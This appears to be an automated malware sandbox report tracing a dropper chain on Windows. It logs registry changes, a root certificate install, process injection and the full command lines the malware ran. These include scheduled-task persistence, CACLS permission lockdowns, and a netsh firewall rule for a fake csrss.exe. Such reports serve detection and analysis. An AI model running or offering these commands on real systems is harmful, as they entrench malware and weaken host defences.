Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	3eef203fb515bda85f514e168abb5973.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

patch.execsrss.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

toolspub2.exeExplorer.EXE3eef203fb515bda85f514e168abb5973.exe3eef203fb515bda85f514e168abb5973.exeinjector.exeXandETC.exepowershell.exepowershell.exe

pid	process
1864	toolspub2.exe
1864	toolspub2.exe
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1344	3eef203fb515bda85f514e168abb5973.exe
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1192	3eef203fb515bda85f514e168abb5973.exe
1192	3eef203fb515bda85f514e168abb5973.exe
1192	3eef203fb515bda85f514e168abb5973.exe
1192	3eef203fb515bda85f514e168abb5973.exe
1192	3eef203fb515bda85f514e168abb5973.exe
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
680	injector.exe
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
680	injector.exe
1204	Explorer.EXE
1204	Explorer.EXE
1800	XandETC.exe
1800	XandETC.exe
680	injector.exe
752	powershell.exe
1204	Explorer.EXE
1204	Explorer.EXE
1800	XandETC.exe
1800	XandETC.exe
1800	XandETC.exe
1800	XandETC.exe
1800	XandETC.exe
1800	XandETC.exe
680	injector.exe
1204	Explorer.EXE
524	powershell.exe
1204	Explorer.EXE
1204	Explorer.EXE
680	injector.exe
1204	Explorer.EXE
1800	XandETC.exe
1800	XandETC.exe
1204	Explorer.EXE
680	injector.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1204 Explorer.EXE
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

460
460
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

toolspub2.exe

pid process

1864 toolspub2.exe

pid	process
1204	Explorer.EXE

pid	process
460
460

Suspicious use of AdjustPrivilegeToken 48 IoCs

Processes:

3eef203fb515bda85f514e168abb5973.exetaskkill.execsrss.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exesc.exeExplorer.EXEpowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeWMIC.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1344	3eef203fb515bda85f514e168abb5973.exe
Token: SeImpersonatePrivilege	1344	3eef203fb515bda85f514e168abb5973.exe
Token: SeDebugPrivilege	324	taskkill.exe
Token: SeSystemEnvironmentPrivilege	928	csrss.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	524	powershell.exe
Token: SeShutdownPrivilege	904	powercfg.exe
Token: SeShutdownPrivilege	1704	powercfg.exe
Token: SeShutdownPrivilege	844	powercfg.exe
Token: SeSecurityPrivilege	1652	sc.exe
Token: SeSecurityPrivilege	1652	sc.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeShutdownPrivilege	1656	powercfg.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeShutdownPrivilege	1936	powercfg.exe
Token: SeShutdownPrivilege	1652	powercfg.exe
Token: SeShutdownPrivilege	1092	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	588	WMIC.exe
Token: SeIncreaseQuotaPrivilege	588	WMIC.exe
Token: SeSecurityPrivilege	588	WMIC.exe
Token: SeTakeOwnershipPrivilege	588	WMIC.exe
Token: SeLoadDriverPrivilege	588	WMIC.exe
Token: SeSystemtimePrivilege	588	WMIC.exe
Token: SeBackupPrivilege	588	WMIC.exe
Token: SeRestorePrivilege	588	WMIC.exe
Token: SeShutdownPrivilege	588	WMIC.exe
Token: SeSystemEnvironmentPrivilege	588	WMIC.exe
Token: SeUndockPrivilege	588	WMIC.exe
Token: SeManageVolumePrivilege	588	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	588	WMIC.exe
Token: SeIncreaseQuotaPrivilege	588	WMIC.exe
Token: SeSecurityPrivilege	588	WMIC.exe
Token: SeTakeOwnershipPrivilege	588	WMIC.exe
Token: SeLoadDriverPrivilege	588	WMIC.exe
Token: SeSystemtimePrivilege	588	WMIC.exe
Token: SeBackupPrivilege	588	WMIC.exe
Token: SeRestorePrivilege	588	WMIC.exe
Token: SeShutdownPrivilege	588	WMIC.exe
Token: SeSystemEnvironmentPrivilege	588	WMIC.exe
Token: SeUndockPrivilege	588	WMIC.exe
Token: SeManageVolumePrivilege	588	WMIC.exe
Token: SeLockMemoryPrivilege	428	conhost.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

oldplayer.exe

pid process

1752 oldplayer.exe

pid	process
1752	oldplayer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exeoldplayer.exeoneetx.execmd.exetoolspub2.exe

description	pid	process	target process
PID 1236 wrote to memory of 1092	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	aafg31.exe
PID 1236 wrote to memory of 1092	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	aafg31.exe
PID 1236 wrote to memory of 1092	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	aafg31.exe
PID 1236 wrote to memory of 1092	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	aafg31.exe
PID 1236 wrote to memory of 1752	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	oldplayer.exe
PID 1236 wrote to memory of 1752	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	oldplayer.exe
PID 1236 wrote to memory of 1752	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	oldplayer.exe
PID 1236 wrote to memory of 1752	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	oldplayer.exe
PID 1752 wrote to memory of 292	1752	oldplayer.exe	oneetx.exe
PID 1752 wrote to memory of 292	1752	oldplayer.exe	oneetx.exe
PID 1752 wrote to memory of 292	1752	oldplayer.exe	oneetx.exe
PID 1752 wrote to memory of 292	1752	oldplayer.exe	oneetx.exe
PID 1236 wrote to memory of 1800	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	XandETC.exe
PID 1236 wrote to memory of 1800	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	XandETC.exe
PID 1236 wrote to memory of 1800	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	XandETC.exe
PID 1236 wrote to memory of 1800	1236	1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe	XandETC.exe
PID 292 wrote to memory of 1324	292	oneetx.exe	schtasks.exe
PID 292 wrote to memory of 1324	292	oneetx.exe	schtasks.exe
PID 292 wrote to memory of 1324	292	oneetx.exe	schtasks.exe
PID 292 wrote to memory of 1324	292	oneetx.exe	schtasks.exe
PID 292 wrote to memory of 916	292	oneetx.exe	cmd.exe
PID 292 wrote to memory of 916	292	oneetx.exe	cmd.exe
PID 292 wrote to memory of 916	292	oneetx.exe	cmd.exe
PID 292 wrote to memory of 916	292	oneetx.exe	cmd.exe
PID 916 wrote to memory of 1764	916	cmd.exe	cmd.exe
PID 916 wrote to memory of 1764	916	cmd.exe	cmd.exe
PID 916 wrote to memory of 1764	916	cmd.exe	cmd.exe
PID 916 wrote to memory of 1764	916	cmd.exe	cmd.exe
PID 916 wrote to memory of 1980	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1980	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1980	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1980	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 752	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 752	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 752	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 752	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 672	916	cmd.exe	cmd.exe
PID 916 wrote to memory of 672	916	cmd.exe	cmd.exe
PID 916 wrote to memory of 672	916	cmd.exe	cmd.exe
PID 916 wrote to memory of 672	916	cmd.exe	cmd.exe
PID 916 wrote to memory of 1524	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1524	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1524	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1524	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1952	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1952	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1952	916	cmd.exe	cacls.exe
PID 916 wrote to memory of 1952	916	cmd.exe	cacls.exe
PID 292 wrote to memory of 324	292	oneetx.exe	toolspub2.exe
PID 292 wrote to memory of 324	292	oneetx.exe	toolspub2.exe
PID 292 wrote to memory of 324	292	oneetx.exe	toolspub2.exe
PID 292 wrote to memory of 324	292	oneetx.exe	toolspub2.exe
PID 324 wrote to memory of 1864	324	toolspub2.exe	toolspub2.exe
PID 324 wrote to memory of 1864	324	toolspub2.exe	toolspub2.exe
PID 324 wrote to memory of 1864	324	toolspub2.exe	toolspub2.exe
PID 324 wrote to memory of 1864	324	toolspub2.exe	toolspub2.exe
PID 324 wrote to memory of 1864	324	toolspub2.exe	toolspub2.exe
PID 324 wrote to memory of 1864	324	toolspub2.exe	toolspub2.exe
PID 324 wrote to memory of 1864	324	toolspub2.exe	toolspub2.exe
PID 292 wrote to memory of 1344	292	oneetx.exe	3eef203fb515bda85f514e168abb5973.exe
PID 292 wrote to memory of 1344	292	oneetx.exe	3eef203fb515bda85f514e168abb5973.exe
PID 292 wrote to memory of 1344	292	oneetx.exe	3eef203fb515bda85f514e168abb5973.exe
PID 292 wrote to memory of 1344	292	oneetx.exe	3eef203fb515bda85f514e168abb5973.exe
PID 292 wrote to memory of 2004	292	oneetx.exe	setup.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\Users\Admin\AppData\Local\Temp\1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe
"C:\Users\Admin\AppData\Local\Temp\1adda3b870c28e6ae33226565b2f31ebfed65adf7a530.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1236

C:\Users\Admin\AppData\Local\Temp\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
3⤵
- Executes dropped EXE
PID:1092

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1752

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:292

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
5⤵
- Creates scheduled task(s)
PID:1324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
5⤵
- Suspicious use of WriteProcessMemory
PID:916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:1764

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
6⤵
PID:1980

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
6⤵
PID:752

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:672

C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
6⤵
PID:1524

C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
6⤵
PID:1952

C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:324

C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000001001\toolspub2.exe"
6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1864

C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1344

C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe"
6⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1192

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
7⤵
PID:1512

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
8⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:340

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:1924

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
8⤵
